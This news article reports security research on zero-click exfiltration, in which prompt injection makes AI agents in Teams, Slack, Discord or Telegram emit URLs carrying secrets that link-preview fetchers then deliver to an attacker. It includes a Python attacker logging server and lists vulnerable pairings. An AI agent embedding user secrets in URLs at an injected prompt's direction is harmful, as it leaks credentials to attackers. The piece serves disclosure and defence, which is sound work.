AI agents can spill secrets via malicious link previews

Security researchers warn that AI agents integrated into messaging apps can leak sensitive data through zero-click attacks that exploit link preview features, with the Microsoft Teams and Copilot Studio combination looking the most vulnerable.

Security researchers have uncovered a critical vulnerability in AI agents that could allow attackers to steal sensitive data without any user interaction, simply by exploiting how messaging apps handle link previews.

The Zero-Click Data Exfiltration Threat

When AI agents operate within messaging platforms like Slack, Telegram, or Microsoft Teams, they can be tricked into generating URLs that contain sensitive information. The problem arises when these platforms automatically fetch link previews - the feature that displays a title, description, and thumbnail when someone shares a link.

"In agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link," explained researchers at AI security firm PromptArmor.

This represents a significant escalation from traditional prompt injection attacks. Previously, attackers needed victims to click on malicious links after an AI system had been tricked into appending sensitive data. Now, the entire attack chain can complete automatically through the link preview system.

How the Attack Works

The vulnerability exploits a fundamental design flaw in how AI agents process and respond to messages. An attacker can craft a malicious prompt that tricks the AI into generating a URL containing sensitive data such as API keys, authentication tokens, or other confidential information. When this URL appears in a message, the messaging app's link preview feature automatically fetches the metadata from the target website.

Because the link preview system makes the network request automatically, the attacker receives the sensitive data without requiring any user interaction. The data appears in the attacker's request logs, having been exfiltrated through what appears to be a legitimate preview request.
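
To make the mechanics concrete, here is a minimal sketch of the attacker's side of the channel. All names (attacker.example, the `secret` query parameter) are hypothetical; the point is that any HTTP server that logs incoming requests will do, because the preview fetch itself delivers the payload:

```python
# Hypothetical exfiltration endpoint - illustrative only.
# A link-preview bot fetching e.g. /steal?secret=sk-live-...
# hands over the secret without anyone clicking anything.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class PreviewLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        print("preview fetch from", self.client_address[0],
              "| user-agent:", self.headers.get("User-Agent"),
              "| payload:", params.get("secret"))
        # Return innocuous metadata so the preview renders normally.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<html><head><title>Quarterly report</title></head></html>")

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), PreviewLogger).serve_forever()
```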

Real-World Testing Reveals Widespread Vulnerabilities

PromptArmor created a testing website where users can evaluate whether their AI agent and messaging app combinations are vulnerable to this attack. The results paint a concerning picture of the current security landscape.

According to the testing data, Microsoft Teams accounts for the largest share of vulnerable link preview fetches, particularly when paired with Microsoft's Copilot Studio. Other problematic combinations include:

  • Discord with OpenClaw
  • Slack with Cursor Slackbot
  • Discord with BoltBot
  • Snapchat with SnapAI
  • Telegram with OpenClaw

Some configurations appear to be safer, including the Claude app in Slack, OpenClaw running via WhatsApp, and OpenClaw deployed via Signal in Docker - though this last option seems to prioritize security over usability.

The OpenClaw Factor

The researchers specifically call out OpenClaw, described as a "vibe-coded agentic AI disaster platform," as vulnerable to this attack in its default Telegram configuration. PromptArmor's data suggests, however, that OpenClaw isn't necessarily the biggest offender in the wild.

The vulnerability in OpenClaw can be mitigated by making changes to its configuration file, but this highlights a broader issue: many AI agent implementations prioritize convenience and functionality over security considerations.
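
Beyond agent-specific settings, one platform-agnostic defence is for the agent (or a thin wrapper around it) to de-fang outbound links so chat clients never attempt a preview. A minimal sketch, assuming the common (but not universal) behaviour that code-formatted text is not unfurled:

```python
import re

URL_RE = re.compile(r"https?://\S+")

def defang_links(agent_reply: str) -> str:
    """Wrap every URL in backticks so most chat clients render it as
    code and skip the automatic preview fetch. Behaviour varies by
    platform, so treat this as defence in depth, not a complete fix."""
    return URL_RE.sub(lambda m: f"`{m.group(0)}`", agent_reply)

# Example: the exfiltration URL survives as text, but nothing fetches it.
print(defang_links("Report ready: https://attacker.example/x?secret=abc123"))
```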

Industry Context and Broader Implications

This vulnerability emerges as companies increasingly integrate AI agents into their workflows and communication platforms. The rush to deploy these tools has created what security experts are calling a significant insider threat.

Palo Alto Networks' security-intelligence boss has identified AI agents as 2026's biggest insider threat, reflecting growing concerns about the security implications of autonomous software agents operating with broad permissions.

Major cloud providers are already rushing to deliver OpenClaw-as-a-service offerings, potentially amplifying the attack surface for this vulnerability. As more organizations adopt these tools, the potential impact of zero-click data exfiltration attacks keeps growing.

The Path Forward

PromptArmor emphasizes that fixing this vulnerability will largely fall to messaging app developers rather than AI agent creators. The security firm recommends that communication apps expose link preview preferences to developers and allow agent developers to leverage these preferences.

"We'd like to see communication apps consider supporting custom link preview configurations on a chat/channel-specific basis to create LLM-safe channels," the researchers stated.

Until such features are implemented, organizations should carefully consider the risks before deploying AI agents in environments where confidentiality is paramount. This vulnerability serves as yet another warning against adding AI agents to sensitive communication channels without proper security controls.

The discovery of this vulnerability underscores the ongoing challenges in securing AI systems as they become more deeply integrated into everyday workflows. As AI agents gain more capabilities and access to sensitive information, the attack surface for malicious actors continues to expand, requiring constant vigilance and proactive security measures from both developers and users.
